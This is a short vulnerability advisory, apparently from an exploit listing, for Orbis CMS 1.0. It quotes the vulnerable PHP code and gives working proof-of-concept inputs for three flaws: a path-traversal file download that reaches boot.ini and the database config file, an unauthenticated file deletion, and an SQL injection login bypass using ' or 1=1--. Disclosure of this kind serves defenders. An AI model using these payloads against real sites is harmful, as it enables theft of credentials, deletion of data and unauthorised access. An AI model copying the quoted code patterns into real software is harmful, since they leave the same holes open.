Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities
Orbis CMS 1.0 is vulnerable to Arbitrary File Download, Arbitrary Delete File, and SQL Injection. No login is required for Arbitrary File Download and Arbitrary Delete File. For SQL Injection, a login is required. The vulnerable code for Arbitrary File Download is header('Content-Type: application/force-download'); header('Content-Disposition: attachment; filename="'.basename($_GET['fn']).'"'); readfile($_GET['fn']); and for Arbitrary Delete File is $filename = $_GET['fn']; unlink($filename) or die("Couldn't delete ".$filename.". Please contact your web designer."); and for SQL Injection is $sql = "SELECT * FROM users WHERE username='".$_POST['username']."' AND password='".$_POST['password']."'". The PoC for Arbitrary File Download is http://127.0.0.1/[path]/admin/fileman_file_download.php?fn=../../../../../../../boot.ini and http://127.0.0.1/path/admin/fileman_file_download.php?fn=includes/config/db.php, for Arbitrary Delete File is http://127.0.0.1/[path]/admin/fileman_file_delete.php?fn=../uploads/example.jpg, and for SQL Injection is username : ' or 1=1-- and password : ' or 1=1--.